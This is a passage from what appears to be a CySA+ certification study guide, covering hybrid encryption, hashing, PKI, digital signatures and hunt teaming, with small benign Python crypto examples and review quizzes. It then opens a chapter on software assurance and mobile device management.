encrypted with the receiver’s public key, which is referred to as
secure message format. If authentication is the primary
concern for an organization, a message should be encrypted
with the sender’s private key, which is referred to as open
message format. When using open message format, the
message can be decrypted by anyone with the public key.
Asymmetric algorithms include Diffie-Hellman, RSA, El Gamal,
ECC, Knapsack, DSA, and Zero Knowledge Proof.
Table 8-6 lists the strengths and weaknesses of asymmetric
algorithms.
Table 8-6 Asymmetric Algorithm Strengths and Weaknesses

Strengths | Weaknesses
Key distribution is easier and more manageable than with symmetric algorithms. | Asymmetric algorithms are more expensive to implement than symmetric algorithms.
Key management is easier because the same public key is used by all parties. | They are 1000 to 10,000 times slower than symmetric algorithms.
Hybrid Encryption
Because both symmetric and asymmetric algorithms have
weaknesses, solutions have been developed that use both types
of algorithms in a hybrid cipher. By using both algorithm types,
the cipher provides confidentiality, authentication, and non-repudiation.
The process for hybrid encryption is as follows:
1. The symmetric algorithm provides the keys used for encryption.
2. The symmetric keys are passed to the asymmetric algorithm, which
encrypts the symmetric keys and automatically distributes them.
3. The message is encrypted with the symmetric key.
4. Both the message and the key are sent to the receiver.
5. The receiver decrypts the symmetric key and uses the symmetric
key to decrypt the message.
An organization should use hybrid encryption if the parties do
not have a shared secret key and large quantities of sensitive
data must be transmitted.
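The numbered steps above can be sketched in Python, assuming the third-party cryptography package. This is a minimal illustration (RSA-OAEP wrapping an AES session key), not a complete secure protocol:

import os
from cryptography.hazmat.primitives import hashes
from cryptography.hazmat.primitives.asymmetric import rsa, padding
from cryptography.hazmat.primitives.ciphers.aead import AESGCM

# Receiver's asymmetric key pair; the public key is shared with the sender.
receiver_key = rsa.generate_private_key(public_exponent=65537, key_size=2048)
oaep = padding.OAEP(mgf=padding.MGF1(algorithm=hashes.SHA256()),
                    algorithm=hashes.SHA256(), label=None)

# Steps 1-3: encrypt the message with a fresh symmetric session key,
# then wrap (encrypt) that session key with the receiver's public key.
session_key = AESGCM.generate_key(bit_length=256)
nonce = os.urandom(12)
ciphertext = AESGCM(session_key).encrypt(nonce, b"large sensitive payload", None)
wrapped_key = receiver_key.public_key().encrypt(session_key, oaep)

# Steps 4-5: the receiver unwraps the session key with the private key,
# then uses the session key to decrypt the message.
recovered_key = receiver_key.decrypt(wrapped_key, oaep)
assert AESGCM(recovered_key).decrypt(nonce, ciphertext, None) == b"large sensitive payload"

The fast symmetric algorithm carries the bulk data, while the slow asymmetric algorithm handles only the small session key, which is the design rationale for hybrid ciphers.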
Message Integrity

Integrity is one of the three basic tenets of security. Message integrity ensures that a message has not been altered; it can be verified by using parity bits, cyclic redundancy checks (CRCs), or checksums.
The parity bit method adds an extra bit to the data. This parity
bit simply indicates if the number of 1 bits is odd or even. The
parity bit is 1 if the number of 1 bits is odd, and the parity bit is
0 if the number of 1 bits is even. The parity bit is set before the
data is transmitted. When the data arrives, the parity bit is
checked against the other data. If the parity bit doesn’t match
the data sent, then an error is sent to the originator.
The CRC method uses polynomial division to determine the
CRC value for a file. The CRC value is usually 16 or 32 bits long.
Because CRC is very accurate, the CRC value does not match up
if a single bit is incorrect.
The checksum method adds up the bytes of data being sent and
then transmits that number to be checked later using the same
method. The source adds up the values of the bytes and sends
the data and its checksum. The receiving end receives the
information, adds up the bytes in the same way the source did,
and gets the checksum. The receiver then compares his
checksum with the source’s checksum. If the values match,
message integrity is intact. If the values do not match, the data
should be re-sent or replaced. Checksums are also referred to as
hash sums because they typically use hash functions for the
computation.
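The three integrity mechanisms can be illustrated with a short Python sketch; zlib.crc32 is from the standard library, and the other two functions are toy implementations for illustration:

import zlib

def parity_bit(data: bytes) -> int:
    """Return 1 if the count of 1 bits is odd, 0 if it is even."""
    ones = sum(bin(byte).count("1") for byte in data)
    return ones % 2

def simple_checksum(data: bytes) -> int:
    """Toy checksum: add up the byte values, truncated to 16 bits."""
    return sum(data) & 0xFFFF

message = b"integrity check"
print(parity_bit(message))            # parity bit set before transmission
print(hex(zlib.crc32(message)))       # 32-bit CRC computed by polynomial division
print(hex(simple_checksum(message)))  # receiver recomputes and compares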
Message integrity is provided by hash functions and message authentication codes, as discussed next.
Hashing Functions
Hash functions are used to ensure integrity. This section
discusses some of the most popular hash functions. Some of
these might no longer be commonly used because more secure
alternatives are available. Security professionals should be
familiar with the following hash functions:
One-way hash
MD2/MD4/MD5/MD6
SHA/SHA-2/SHA-3
A hash function takes a message of variable length and
produces a fixed-length hash value. Hash values, also referred
to as message digests, are calculated using the original message.
If the receiver calculates a hash value that is the same, then the
original message is intact. If the receiver calculates a hash value
that is different, then the original message has been altered.
Using a given hash function H, the following must hold for any message M2 that differs from the original message M1; otherwise, M1 could be altered or replaced without detection:

H(M1) ≠ H(M2)
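This check can be sketched with Python's standard hashlib library:

import hashlib

m1 = b"original message"
m2 = b"altered message!"

# The receiver recomputes the digest; any change to the message
# produces a different hash value.
print(hashlib.sha256(m1).hexdigest() == hashlib.sha256(m1).hexdigest())  # True: intact
print(hashlib.sha256(m1).hexdigest() == hashlib.sha256(m2).hexdigest())  # False: altered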
One-way Hash
For a one-way hash to be effective, creating two different
messages with the same hash value must be mathematically
impossible. Given a hash value, discovering the original
message from which the hash value was obtained must be
mathematically impossible. A one-way hash algorithm is
collision free if it provides protection against creating the same
hash value from different messages.
Unlike symmetric and asymmetric algorithms, the hashing
algorithm is publicly known. Hash functions are always performed in one direction; using them in reverse is unnecessary.
However, one-way hash functions do have limitations. If an
attacker intercepts a message that contains a hash value, the
attacker can alter the original message to create a second,
invalid message with a new hash value. If the attacker then
sends the invalid message to the intended recipient, the
intended recipient has no way of knowing that he received an
incorrect message. When the receiver performs a hash value
calculation, the invalid message looks valid because the invalid
message was appended with the attacker’s new hash value, not
the original message’s hash value.
To prevent the preceding scenario from occurring, the sender
should use a message authentication code (MAC). Encrypting the hash value with a symmetric key algorithm generates a keyed MAC. The symmetric key does not encrypt the original message; it is used only to protect the hash value.
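As an illustration of the keyed-MAC idea, the following sketch uses HMAC from Python's standard library. HMAC is a standard keyed-hash construction rather than literal encryption of the hash value, but it serves the same purpose: without the shared key, an attacker cannot produce a valid MAC for an altered message.

import hashlib
import hmac

shared_key = b"symmetric key shared out of band"
message = b"the message itself is not encrypted"

# The key protects the hash value, not the message.
tag = hmac.new(shared_key, message, hashlib.sha256).digest()

# The receiver recomputes the MAC with the same key and compares safely.
expected = hmac.new(shared_key, message, hashlib.sha256).digest()
print(hmac.compare_digest(tag, expected))  # True only if message and key match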
Figure 8-30 outlines the basic steps of a hash function.
Figure 8-30 Hash Function Process
Message Digest Algorithm
The MD2 message digest algorithm produces a 128-bit hash
value. It performs 18 rounds of computations. Although MD2 is
still in use today, it is much slower than MD4, MD5, and MD6.
The MD4 algorithm also produces a 128-bit hash value.
However, it performs only three rounds of computations.
Although MD4 is faster than MD2, its use has significantly
declined because attacks against it have been so successful.
Like the other MD algorithms, the MD5 algorithm produces a
128-bit hash value. It performs four rounds of computations. It
was originally created because of the issues with MD4, and it is
more complex than MD4. However, MD5 is not collision free.
For this reason, it should not be used for SSL/TLS certificates or
digital signatures. The U.S. government requires the usage of
SHA-2 instead of MD5. However, in commercial usage, many
software vendors publish the MD5 hash value when they release
software patches so customers can verify the software’s integrity
after download.
The MD6 algorithm produces a variable hash value, performing
a variable number of computations. Although it was originally
introduced as a candidate for SHA-3, it was withdrawn because
of early issues the algorithm had with differential attacks. MD6
has since been re-released with this issue fixed. However, that
release was too late to be accepted as the NIST SHA-3 standard.
Secure Hash Algorithm
Secure Hash Algorithm (SHA) is a family of four algorithms
published by NIST. SHA-0, originally referred to as simply SHA
because there were no other “family members,” produces a 160-bit hash value after performing 80 rounds of computations on
512-bit blocks. SHA-0 was never very popular because collisions
were discovered.
Like SHA-0, SHA-1 produces a 160-bit hash value after
performing 80 rounds of computations on 512-bit blocks. SHA-1 corrected the flaw in SHA-0 that made it susceptible to
attacks.
The SHA-2 family, which includes SHA-224, SHA-256, SHA-384, and SHA-512, produces hash values of the corresponding bit lengths. SHA-3, the latest version, is actually a family of hash functions, each of which provides different functional limits. The SHA-3 family is as follows:
SHA3-224: Produces a 224-bit hash value after performing 24
rounds of computations on 1152-bit blocks
SHA3-256: Produces a 256-bit hash value after performing 24
rounds of computations on 1088-bit blocks
SHA3-384: Produces a 384-bit hash value after performing 24
rounds of computations on 832-bit blocks
SHA3-512: Produces a 512-bit hash value after performing 24
rounds of computations on 576-bit blocks
Keep in mind that SHA-1 and SHA-2 are still widely used today.
SHA-3 was not developed because of some security flaw with
the two previous standards but was instead proposed as an
alternative hash function to the others.
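The SHA-3 digest lengths listed above can be confirmed with Python's standard hashlib library:

import hashlib

for name in ("sha3_224", "sha3_256", "sha3_384", "sha3_512"):
    digest = hashlib.new(name, b"CySA+").digest()
    print(name, len(digest) * 8, "bits")  # 224, 256, 384, and 512 bits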
Transport Encryption
Securing data at rest and data in transit leverages the respective
strengths and weaknesses of symmetric and asymmetric
algorithms. Applying the two types of algorithms is typically
done as shown in Table 8-7.
Table 8-7 Applying Cryptography

Data Type | Crypto Type | Examples | Application
Data at rest | Symmetric key | DES (retired), AES (revised), 3DES, Blowfish | Storing data on hard drives, thumb drives, etc.—any application where the key can easily be shared
Data in transit | Asymmetric key | RSA, Diffie-Hellman, ECC, ElGamal, DSA | SSL/TLS key exchange hash
Transport encryption ensures that data is protected when it is
transmitted over a network or the Internet. Transport
encryption protects against network sniffing attacks.
Security professionals should ensure that their enterprises are
protected using transport encryption in addition to protecting
data at rest. As an example, think of an enterprise that
implements token and biometric authentication for all users,
protected administrator accounts, transaction logging, full-disk
encryption, server virtualization, port security, firewalls with
ACLs, NIPS, and secured access points. None of these solutions
provides any protection for data in transport. Transport
encryption would be necessary in this environment to protect
data. To provide this encryption, secure communication
mechanisms should be used, including SSL/TLS,
HTTP/HTTPS/SHTTP, SET, SSH, and IPsec.
SSL/TLS
Secure Sockets Layer (SSL) is a transport-layer protocol that
provides encryption, server and client authentication, and
message integrity. SSL/TLS was discussed earlier in this
chapter.
HTTP/HTTPS/SHTTP
Hypertext Transfer Protocol (HTTP) is the protocol used on the
Web to transmit website data between a web server and a web
client. With each new address that is entered into the web
browser, whether from initial user entry or by clicking a link on
the page displayed, a new connection is established because
HTTP is a stateless protocol.
HTTP Secure (HTTPS) is the implementation of HTTP running
over the SSL/TLS protocol, which establishes a secure session
using the server’s digital certificate. SSL/TLS keeps the session
open using a secure channel. HTTPS websites always include
the https:// designation at the beginning.
Although it sounds similar to HTTPS, Secure HTTP (S-HTTP)
protects HTTP communication in a different manner. S-HTTP
only encrypts a single communication message, not an entire
session (or conversation). S-HTTP is not as commonly used as
HTTPS.
SSH
Secure Shell (SSH) is an application and protocol that is
used to remotely log in to another computer using a secure
tunnel. After a session key is exchanged and the secure channel is established, all communication between the two computers is encrypted over the secure channel.
IPsec
Internet Protocol Security (IPsec) is a suite of protocols that
establishes a secure channel between two devices. IPsec is
commonly implemented over VPNs. IPsec was discussed earlier
in this chapter.
CERTIFICATE MANAGEMENT
A public key infrastructure (PKI) includes systems,
software, and communication protocols that distribute, manage,
and control public key cryptography. A PKI publishes digital
certificates. Because a PKI establishes trust within an
environment, a PKI can certify that a public key is tied to an
entity and verify that a public key is valid. Public keys are
published through digital certificates.
The X.509 standard is a framework that enables authentication
between networks and over the Internet. A PKI includes
timestamping and certificate revocation to ensure that
certificates are managed properly. A PKI provides
confidentiality, message integrity, authentication, and non-repudiation.
The structure of a PKI includes certificate authorities,
certificates, registration authorities, certificate revocation lists,
cross-certification, and the Online Certificate Status Protocol
(OCSP). This section discusses these PKI components as well as
a few other PKI concepts.
Certificate Authority and Registration Authority
Any participant that requests a certificate must first go through
the registration authority (RA), which verifies the
requestor’s identity and registers the requestor. After the
identity is verified, the RA passes the request to the certificate
authority.
A certificate authority (CA) is the entity that creates and
signs digital certificates, maintains the certificates, and revokes
them when necessary. Every entity that wants to participate in
the PKI must contact the CA and request a digital certificate. It
is the ultimate authority for the authenticity of every participant in the PKI because it signs each digital certificate. The
certificate binds the identity of the participant to the public key.
There are different types of CAs. Some organizations provide a PKI as a paid service to companies that need one; Verisign is an example. Some organizations implement their
own private CAs so that the organization can control all aspects
of the PKI process. If an organization is large enough, it might
need to provide a structure of CAs, with the root CA being the
highest in the hierarchy.
Because more than one entity is often involved in the PKI
certification process, certification path validation allows the
participants to check the legitimacy of the certificates in the
certification path.
Certificates
A digital certificate provides an entity, usually a user, with the
credentials to prove its identity and associates that identity with
a public key. At minimum, a digital certificate must provide
the serial number, the issuer, the subject (owner), and the
public key.
An X.509 certificate complies with the X.509 standard. An
X.509 certificate contains the following fields:
Version
Serial Number
Algorithm ID
Issuer
Validity
Subject
Subject Public Key Info
Public Key Algorithm
Subject Public Key
Issuer Unique Identifier (optional)
Subject Unique Identifier (optional)
Extensions (optional)
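As a sketch of how these fields appear in practice, the following reads a certificate with the third-party cryptography package; the file name cert.pem is a placeholder:

from cryptography import x509

with open("cert.pem", "rb") as f:
    cert = x509.load_pem_x509_certificate(f.read())

print(cert.version)                  # Version
print(cert.serial_number)            # Serial Number
print(cert.signature_algorithm_oid)  # Algorithm ID
print(cert.issuer)                   # Issuer
print(cert.not_valid_before, cert.not_valid_after)  # Validity
print(cert.subject)                  # Subject
print(cert.public_key())             # Subject Public Key Info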
Verisign first introduced the following digital certificate classes:
Class 1: Intended for use with email. These certificates get saved by
web browsers.
Class 2: For organizations that must provide proof of identity.
Class 3: For servers and software signing in which independent
verification and identity and authority checking is done by the
issuing CA.
Certificate Revocation List
A certificate revocation list (CRL) is a list of digital
certificates that a CA has revoked. To find out whether a digital
certificate has been revoked, either the browser must check the CRL or the CA must push the CRL values out to clients. This can
become quite daunting when you consider that the CRL
contains every certificate that has ever been revoked.
One concept to keep in mind is the revocation request grace
period. This period is the maximum amount of time between
when the revocation request is received by the CA and when the
revocation actually occurs. A shorter revocation period provides
better security but often results in a higher implementation
cost.
OCSP
The Online Certificate Status Protocol (OCSP) is an
Internet protocol that obtains the revocation status of an X.509
digital certificate. OCSP is an alternative to the standard
certificate revocation list (CRL) that is used by many PKIs.
OCSP automatically validates the certificates and reports back
the status of the digital certificate by accessing the CRL on the
CA.
PKI Steps
The steps involved in requesting a digital certificate are as follows:
1. A user requests a digital certificate, and the RA receives the request.
2. The RA requests identifying information from the requestor.
3. After the required information is received, the RA forwards the
certificate request to the CA.
4. The CA creates a digital certificate for the requestor. The
requestor’s public key and identity information are included as part
of the certificate.
5. The user receives the certificate.
After the user has a certificate, she is ready to communicate
with other trusted entities. The process for communication
between entities is as follows:
1. User 1 requests User 2’s public key from the certificate repository.
2. The repository sends User 2’s digital certificate to User 1.
3. User 1 verifies the certificate and extracts User 2’s public key.
4. User 1 encrypts the session key with User 2’s public key and sends
the encrypted session key and User 1’s certificate to User 2.
5. User 2 receives User 1’s certificate and verifies the certificate with a
trusted CA.
After this certificate exchange and verification process occurs,
the two entities are able to communicate using encryption.
Cross-Certification
Cross-certification establishes trust relationships between CAs
so that the participating CAs can rely on the other participants’
digital certificates and public keys. It enables users to validate
each other’s certificates when they are actually certified under
different certification hierarchies. A CA for one organization can
validate digital certificates from another organization’s CA when
a cross-certification trust relationship exists.
Digital Signatures
A digital signature is a hash value encrypted with the sender’s private key. A digital signature provides authentication, non-repudiation, and integrity. A blind signature is a form of digital signature in which the contents of the message are masked before it is signed.
Public key cryptography is used to create digital signatures.
Users register their public keys with a certificate authority (CA),
which distributes a certificate containing the user’s public key
and the CA’s digital signature. That signature is computed over the certificate’s contents, including the user’s public key, the validity period, the certificate issuer, and the digital signature algorithm identifier.
The Digital Signature Standard (DSS) is a federal digital signature standard that governs the Digital Signature Algorithm (DSA). DSA generates a message digest of 160 bits. The U.S.
federal government requires the use of DSA, RSA, or Elliptic
Curve DSA (ECDSA) and SHA for digital signatures. DSA is
slower than RSA and only provides digital signatures. RSA
provides digital signatures, encryption, and secure symmetric
key distribution.
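A minimal signing-and-verification sketch, assuming the third-party cryptography package and using ECDSA with SHA-256 (one of the DSS-approved combinations named above):

from cryptography.exceptions import InvalidSignature
from cryptography.hazmat.primitives import hashes
from cryptography.hazmat.primitives.asymmetric import ec

sender_key = ec.generate_private_key(ec.SECP256R1())
message = b"wire transfer approval: account 12345"

# Sign: the library hashes the message and signs the digest
# with the sender's private key.
signature = sender_key.sign(message, ec.ECDSA(hashes.SHA256()))

# Verify: anyone holding the sender's public key can check the signature.
try:
    sender_key.public_key().verify(signature, message, ec.ECDSA(hashes.SHA256()))
    print("valid: authentication, integrity, and non-repudiation")
except InvalidSignature:
    print("invalid: message altered or not signed by this sender")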
When considering cryptography, keep the following facts in
mind:
Encryption provides confidentiality.
Hashing provides integrity.
Digital signatures provide authentication, non-repudiation, and
integrity.
ACTIVE DEFENSE
The importance of defense systems in network architecture is
emphasized throughout this book. In the context of
cybersecurity, the term active defense has more to do with
process than architecture. Active defense is achieved by aligning
your incident identification and incident response processes
such that there is an element of automation built into your
reaction to any specific issue. So what does that look like in the
real world? One approach among several is called the Active
Cyber Defense Cycle, illustrated in Figure 8-31.
Figure 8-31 Active Cyber Defense Cycle
While it may not be obvious from the graphic, one of the key
characteristics of this approach is that there is an active
response to the security issue. This departs from the classic
approach of deploying passive defense mechanisms and relying
on them to protect assets.
Hunt Teaming
Hunt teaming is a new approach to security that is offensive
in nature rather than defensive, which has been the common
approach of security teams in the past. Hunt teams work
together to detect, identify, and understand advanced and
determined threat actors. A hunt team is a costly investment on the part of an organization; it targets the attackers themselves. To use a
bank analogy, when a bank robber compromises a door to rob a
bank, defensive measures would say get a better door, while
offensive measures (hunt teaming) would say eliminate the
bank robber. These cyber guns-for-hire are another tool in the
kit.
Hunt teaming also refers to a collection of techniques used by
security personnel to bypass traditional security technologies to
hunt down other attackers who may have used similar
techniques to mount attacks that have already been identified,
often by other companies. These techniques help in identifying
any systems compromised using advanced malware that
bypasses traditional security technologies, such as an intrusion
detection system/intrusion prevention system (IDS/IPS) or an
antivirus application. As part of hunt teaming, security
professionals could also obtain blacklists from sources like
DShield (https://www.dshield.org/). These blacklists would
then be compared to existing DNS entries to see if
communication was occurring with systems on these blacklists
that are known attackers.
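A hypothetical sketch of that comparison in Python; the file names and the one-address-per-line format are assumptions for illustration:

def load_addresses(path):
    with open(path) as f:
        return {line.strip() for line in f if line.strip() and not line.startswith("#")}

blocklist = load_addresses("dshield_blocklist.txt")  # known-attacker addresses
dns_entries = load_addresses("dns_query_log.txt")    # addresses seen in DNS logs

# Any overlap suggests communication with a known attacker.
for address in sorted(dns_entries & blocklist):
    print("possible communication with known attacker:", address)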
Hunt teaming can also emulate prior attacks so that security
professionals can better understand the enterprise’s existing
vulnerabilities and get insight into how to remediate and
prevent future incidents.
EXAM PREPARATION TASKS
As mentioned in the section “How to Use This Book” in the
Introduction, you have several choices for exam preparation:
the exercises here, Chapter 22, “Final Preparation,” and the
exam simulation questions in the Pearson Test Prep Software
Online.
REVIEW ALL KEY TOPICS
Review the most important topics in this chapter, noted with
the Key Topics icon in the outer margin of the page. Table 8-8
lists a reference of these key topics and the page numbers on
which each is found.
Table 8-8 Key Topics in Chapter 8

Key Topic Element | Description | Page Number
Bulleted list | Risks when placing resources in a public cloud | 177
Figure 8-2 | Network segmentation | 182
Bulleted list | Threats addressed by VLANs | 183
Figure 8-5 | Server isolation | 185
Figure 8-6 | Logical network diagram | 186
Figure 8-7 | Physical network diagram | 187
Bulleted list | Protecting a bastion host | 188
Bulleted list | Deployment options for a bastion host | 188
Bulleted lists | Advantages and disadvantages of a dual-homed firewall | 189
Bulleted lists | Advantages and disadvantages of a three-legged firewall | 190
Bulleted lists | Advantages and disadvantages of a screened host firewall | 191
Bulleted lists | Advantages and disadvantages of a screened subnet | 192
Bulleted list | Network architecture planes | 193
Bulleted lists | Advantages and disadvantages of SDN | 194
Bulleted list | VPN protocols | 196
Bulleted list | Components of IPsec | 197
Bulleted list | SSL/TLS VPNs | 199
Table 8-2 | Advantages and disadvantages of SSL/TLS | 200
Bulleted list | Improvements in TLS 1.3 | 200
Bulleted list and paragraph | Security advantages and disadvantages of virtualization | 201
Figure 8-16 | Virtualization | 202
Section | Type 1 vs. Type 2 hypervisors | 203
Bulleted list | Virtualization attacks | 203
Bulleted list | Attacks on management interfaces | 205
Figure 8-19 | Man-in-the-middle attack | 206
Bulleted list | VDI models | 207
Figure 8-22 | Container-based virtualization | 209
Bulleted list | Authentication factors | 212
Bulleted list | Objectives of SSO | 214
Bulleted lists | Advantages and disadvantages of SSO | 215
Bulleted lists | Advantages and disadvantages of Kerberos | 216
Figure 8-23 | Kerberos ticket-issuing process | 217
Bulleted list | Federation models | 219
Bulleted list | Security issues with federations | 219
Bulleted list | SPML architecture components | 220
Figure 8-25 | SPML process | 221
Bulleted lists | Advantages and disadvantages of OpenID | 222
Numbered list | SAML process | 223
Paragraph | Description of role-based access control (RBAC) | 224
Bulleted list | MAC security modes | 228
Bulleted list | Responsibilities of log management infrastructure administrators | 230
Table 8-3 | Examples of logging configuration settings | 231
Numbered list | NIST SP 800-137 steps to establish, implement, and maintain ISCM | 232
Bulleted list | Security services provided by cryptosystems | 233
Table 8-4 | Symmetric algorithm strengths and weaknesses | 234
Bulleted list | Advantages of stream-based ciphers | 235
Bulleted list | Advantages of block ciphers | 235
Table 8-5 | Symmetric algorithms key facts | 235
Table 8-6 | Asymmetric algorithm strengths and weaknesses | 236
Numbered list | Process for hybrid encryption | 237
Figure 8-30 | Hash function process | 239
Table 8-7 | Applying cryptography | 241
Bulleted list | Digital certificate classes | 244
Numbered list | PKI steps | 245
Figure 8-31 | Active Cyber Defense Cycle | 246
DEFINE KEY TERMS
Define the following key terms from this chapter and check your
answers in the glossary:
asset tagging
geotagging
geofencing
radio frequency identification (RFID)
segmentation
extranet
demilitarized zone (DMZ)
virtual local-area network (VLAN)
jumpbox
system isolation
air gap
bastion host
dual-homed firewall
multihomed firewall
screened host firewall
screened subnet
control plane
data plane
management plane
virtual storage area network (vSAN)
virtual private cloud (VPC)
virtual private network (VPN)
Point-to-Point Tunneling Protocol (PPTP)
Layer 2 Tunneling Protocol (L2TP)
Internet Protocol Security (IPsec)
Authentication Header (AH)
Encapsulating Security Payload (ESP)
Internet Security Association and Key Management Protocol
(ISAKMP)
Internet Key Exchange (IKE)
Secure Sockets Layer/Transport Layer Security (SSL/TLS)
change management
Type 1 hypervisor
Type 2 hypervisor
VM escape
virtual desktop infrastructure (VDI)
containerization
multifactor authentication (MFA)
knowledge factor authentication
ownership factor authentication
characteristic factor authentication
single sign-on (SSO)
Active Directory (AD)
Secure European System for Applications in a Multivendor
Environment (SESAME)
Service Provisioning Markup Language (SPML)
Security Assertion Markup Language (SAML)
OpenID
Shibboleth
role-based access control (RBAC)
attribute-based access control (ABAC)
mandatory access control (MAC)
cloud access security broker (CASB)
honeypot
symmetric algorithms
stream-based ciphers
block ciphers
asymmetric algorithms
Secure Shell (SSH)
public key infrastructure (PKI)
registration authority (RA)
certificate authority (CA)
Online Certificate Status Protocol (OCSP)
certificate revocation list (CRL)
active defense
hunt teaming
REVIEW QUESTIONS
1. _____________________ is the process of placing
physical identification numbers of some sort on all assets.
2. List at least two examples of segmentation.
3. Match the following terms with their definitions.
Terms | Definitions
Jumpbox | Device with no network connections; all access to the system must be done manually by adding and removing updates and patches with a flash drive or other external device
System isolation | Device exposed directly to the Internet or to any untrusted network
Air gap | Systems isolated from other systems through the control of communications with the device
Bastion host | Firewall with two network interfaces: one pointing to the internal network and another connected to an untrusted network
Dual-homed firewall | A server that is used to access devices that have been placed in a secure network zone such as a DMZ
4. In a(n) _____________________, two firewalls are
used, and traffic must be inspected at both firewalls before it
can enter the internal network.
5. List at least one of the network architecture planes.
6. Match the following terms with their definitions.
Terms | Definitions
VSAN | Allows external devices to access an internal network by creating a tunnel over the Internet
VPC | Cloud model in which a public cloud provider isolates a specific portion of its public cloud infrastructure to be provisioned for private use
VLAN | Logical segmentation on a switch at Layers 2 and 3
VPN | Software-defined storage method that allows pooling of storage capabilities and instant and automatic provisioning of virtual machine storage
7. ____________________________ handles the
creation of a security association for the session and the
exchange of keys in IPsec.
8. List at least two advantages of SSL/TLS.
9. Match the following terms with their definitions.
Terms | Definitions
Type 1 hypervisor | Virtualization method that does not use a hypervisor
Containerization | Hypervisor installed over an operating system
VDI | Hypervisor installed on bare metal
Type 2 hypervisor | Hosting desktop operating systems within a virtual environment in a centralized server
10. ______________________ are authentication factors
that rely on something you have in your possession.
Chapter 9
Software Assurance Best
Practices
This chapter covers the following topics related to Objective 2.2
(Explain software assurance best practices) of the CompTIA
Cybersecurity Analyst (CySA+) CS0-002 certification exam:
Platforms: Reviews software platforms, including mobile, web
application, client/server, embedded, System-on-Chip (SoC), and
firmware.
Software development life cycle (SDLC) integration:
Explains the formal process specified by the SDLC.
DevSecOps: Discusses the DevSecOps framework.
Software assessment methods: Covers user acceptance testing,
stress test application, security regression testing, and code review.
Secure coding best practices: Examines input validation,
output encoding, session management, authentication, data
protection, and parameterized queries.
Static analysis tools: Covers tools and methods for performing
static analysis.
Dynamic analysis tools: Discusses tools used to test the software
as it is running.
Formal methods for verification of critical software:
Discusses more structured methods of analysis.
Service-oriented architecture: Reviews Security Assertions
Markup Language (SAML), Simple Object Access Protocol (SOAP),
and Representational State Transfer (REST) and introduces
microservices.
Many organizations create software either for customers or for
their own internal use. When software is developed, the earlier
in the process security is considered, the less it will cost to
secure the software. It is best for software to be secure by
design. Secure coding standards are practices that, if followed
throughout the software development life cycle, help reduce the
attack surface of an application. Standards are developed
through a broad-based community effort for common
programming languages. This chapter looks at application
security, the type of testing to conduct, and secure coding best
practices from several well-known organizations that publish
guidance in this area.
“DO I KNOW THIS ALREADY?” QUIZ
The “Do I Know This Already?” quiz enables you to assess
whether you should read the entire chapter. If you miss no more
than one of these nine self-assessment questions, you might
want to skip ahead to the “Exam Preparation Tasks” section.
Table 9-1 lists the major headings in this chapter and the “Do I
Know This Already?” quiz questions covering the material in
those headings so that you can assess your knowledge of these
specific areas. The answers to the “Do I Know This Already?”
quiz appear in Appendix A.
Table 9-1 “Do I Know This Already?” Foundation Topics
Section-to-Question Mapping
Foundation Topics Section
Questio
n
Platforms
1
Software Development Life Cycle (SDLC)
Integration
2
DevSecOps
3
Software Assessment Methods
4
Secure Coding Best Practices
5
Static Analysis Tools
6
Dynamic Analysis Tools
7
Formal Methods for Verification of Critical
Software
8
Service-Oriented Architecture
9
1. Which of the following is software designed to exert a
measure of control over mobile devices?
1. IoT
2. BYOD
3. MDM
4. COPE
2. Which of the following is the first step in the SDLC?
1. Design
2. Plan/initiate project
3. Release/maintain
4. Develop
3. Which of the following is not one of the three main actors in
traditional DevOps?
1. Operations
2. Security
3. QA
4. Production
4. Which of the following is done to verify functionality after
making a change to the software?
1. User acceptance testing
2. Regression testing
3. Fuzz testing
4. Code review
5. Which of the following is done to prevent the inclusion of
dangerous character types that might be inserted by
malicious individuals?
1. Input validation
2. Blacklisting
3. Output encoding
4. Fuzzing
6. Which form of code review looks at runtime information
while the software is in a static state?
1. Lexical analysis
2. Data flow analysis
3. Control flow graph
4. Taint analysis
7. Which of the following uses external agents to run scripted
transactions against an application?
1. RUM
2. Synthetic transaction monitoring
3. Fuzzing
4. SCCP
8. Which of the following levels of formal methods would be
the most appropriate in high-integrity systems involving
safety or security?
1. Level 0
2. Level 1
3. Level 2
4. Level 3
9. Which of the following is a client/server model for
interacting with content on remote systems, typically using
HTTP?
1. SOAP
2. SAML
3. OpenID
4. REST
FOUNDATION TOPICS
PLATFORMS
All software must run on an underlying platform that supplies
the software with the resources required to perform and
connections to the underlying hardware with which it must
interact. This section provides an overview of some common
platforms for which software is written.
Mobile
You learned a lot about the issues with mobile as a platform in
Chapter 5, “Threats and Vulnerabilities Associated with
Specialized Technology.” Let’s look at some additional issues
with this platform.
Containerization
One of the issues with allowing the use of personal devices in a
bring your own device (BYOD) initiative is the possible mixing
of sensitive corporate data with the personal data of the user.
Containerization is a newer feature of most mobile device
management (MDM) software that creates an encrypted
“container” to hold and quarantine corporate data separately
from that of the user’s data. This allows for MDM policies to be
applied only to that container and not the rest of the device.
Configuration Profiles and Payloads
MDM configuration profiles are used to control the use of
devices; when these profiles are applied to the devices, they
make changes to settings such as the passcode settings, Wi-Fi
passwords, virtual private network (VPN) configurations, and
more. Profiles also can restrict items that are available to the
user, such as the camera. The individual settings, called
payloads, may be organized into categories in some
implementations. For example, there may be a payload category
for basic settings, such as a required passcode, and other
payload categories, such as e-mail settings, Internet, and so on.
Personally Owned, Corporate Enabled
When a personally owned, corporate-enabled (POCE) policy is
in use, the organization’s users purchase their own devices but
allow the devices to be managed by corporate tools such as
MDM software.
Corporate-Owned, Personally Enabled
Corporate-owned, personally enabled (COPE) is a
strategy in which an organization purchases mobile devices and
users manage those devices. Organizations can often monitor
and control the users’ activity to a larger degree than with
personally owned devices. Besides using these devices for
business purposes, employees can use the devices for personal
activities, such as accessing social media sites, using e-mail, and
making calls. COPE also gives the company more power in
terms of policing and protecting devices. Organizations should
create explicit policies that define the allowed and disallowed
activities on COPE devices.
Application Wrapping
Another technique to protect mobile devices and the data they
contain is application wrapping. Application wrappers
(implemented as policies) enable administrators to set policies
that allow employees with mobile devices to safely download an
app, typically from an internal store. Policy elements can
include elements such as whether user authentication is
required for a specific app and whether data associated with the
app can be stored on the device.
Application, Content, and Data Management
In addition to the previously discussed containerization method
of securing data and applications, MDM solutions can use other
methods as well, such as conditional access, which defines
policies that control access to corporate data based on
conditions of the connection, including user, location, device
state, application sensitivity, and real-time risk. Moreover, these
policies can be granular enough to control certain actions within
an application, such as preventing cut and paste. Finally, more
secure control of sharing is possible, allowing for the control
and tracking of what happens after a file has been accessed,
with the ability to prevent copying, printing, and other actions
that help control sharing with unauthorized users.
Remote Wiping
Remote wipes are instructions sent remotely to a mobile
